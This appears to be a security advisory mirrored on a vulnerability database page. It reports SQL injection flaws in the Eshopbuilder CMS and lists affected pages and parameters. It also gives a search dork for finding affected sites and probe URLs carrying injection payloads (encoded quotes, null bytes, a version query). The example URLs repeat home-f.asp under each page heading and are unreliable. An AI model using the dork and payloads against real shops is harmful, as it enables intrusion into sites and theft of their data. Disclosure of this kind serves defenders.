Lucene search

K

Eshopbuilde CMS SQL Injection Vulnerability

🗓️ 30 Nov 2009 00:00:00Reported by IsfahanType 
zdt
 zdt
🔗 0day.today👁 26 Views

Eshopbuilder CMS SQL Injection Vulnerabilit

Show more
Code
===========================================
Eshopbuilde CMS SQL Injection Vulnerability
===========================================

Title: Eshopbuilde CMS SQL Injection Vulnerability
 
Vendor: www.eshopbuilder.ir
 
Dork: Design by Satcom Co
Type: Input.Validation.Vulnerability (SQL Injection)
 
Fix: N/A
 
Description:
 
------------------
 
Eshopbuilder is a E-shop CMS written in persian language. The Eshopbuilder product is vulnerable to SQL injection.
 
 
Vulnerability Variant:
 
------------------
Injection "/home-f.asp","/opinions-f.asp" in "sitebid" parameter.
 
http://www.example.com/src=www.example.com/[email protected]@version
http://www.example.com/src=www.example.com/home-f.asp?sitebid=JyI%3D
http://www.example.com/src=www.example.com/home-f.asp?sitebid=%00
 
Injection "/more-f.asp" in "sitebid" ,"id","secText","client-ip" and "G_id" parameters.
 
http://www.example.com/src=www.example.com/[email protected]@version
http://www.example.com/src=www.example.com/home-f.asp?sitebid=JyI%3D
http://www.example.com/src=www.example.com/home-f.asp?sitebid=%00
http://www.example.com/src=www.example.com/home-f.asp?sitebid=\"
 
other parameters("id","secText","client-ip","G_id") is similar to "sitebid" parameter.
Injection "/selectintro.asp" in "sitebid" ,"id","ma_id","mi_id","secText","client-ip" and "G_id" parameters.
 
http://www.example.com/src=www.example.com/[email protected]@version
http://www.example.com/src=www.example.com/home-f.asp?sitebid=JyI%3D
http://www.example.com/src=www.example.com/home-f.asp?sitebid=%00
 
other parameters("id","ma_id","mi_id","secText","client-ip" and "G_id") is similar to "sitebid" parameter.
 
Injection "/advcount.asp" in "sitebid","secText","adv_code" and "client-ip" parameters.
 
http://www.example.com/src=www.example.com/[email protected]@version
http://www.example.com/src=www.example.com/home-f.asp?sitebid=JyI%3D
http://www.example.com/src=www.example.com/home-f.asp?sitebid=%00
 
other parameters("secText" and "client-ip") is similar to "sitebid" parameter.
 
Injection "/advview.asp" in "sitebid","secText","Grp_Code","_method" and "client-ip" parameters.
 
http://www.example.com/src=www.example.com/[email protected]@version
http://www.example.com/src=www.example.com/home-f.asp?sitebid=JyI%3D
http://www.example.com/src=www.example.com/home-f.asp?sitebid=%00
 
other parameters("secText","client-ip","Grp_Code","_method" and "adv_code") is similar to "sitebid" parameter.
 
Injection "/dis_new-f.asp" in "sitebid","secText","newsId" and "client-ip" parameters.
 
http://www.example.com/src=www.example.com/[email protected]@version
http://www.example.com/src=www.example.com/home-f.asp?sitebid=JyI%3D
http://www.example.com/src=www.example.com/home-f.asp?sitebid=%00
 
other parameters("secText","newsId" and "client-ip") is similar to "sitebid" parameter.
 
 
Solution:
 
------------------
 
Input validation of Parameter "sitebid","id","secText","client-ip","G_id","ma_id","mi_id","Grp_Code","_method","adv_code" should be corrected.


#  0day.today [2018-03-28]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
30 Nov 2009 00:00Current
7.1High risk
Vulners AI Score7.1
26
.json
Report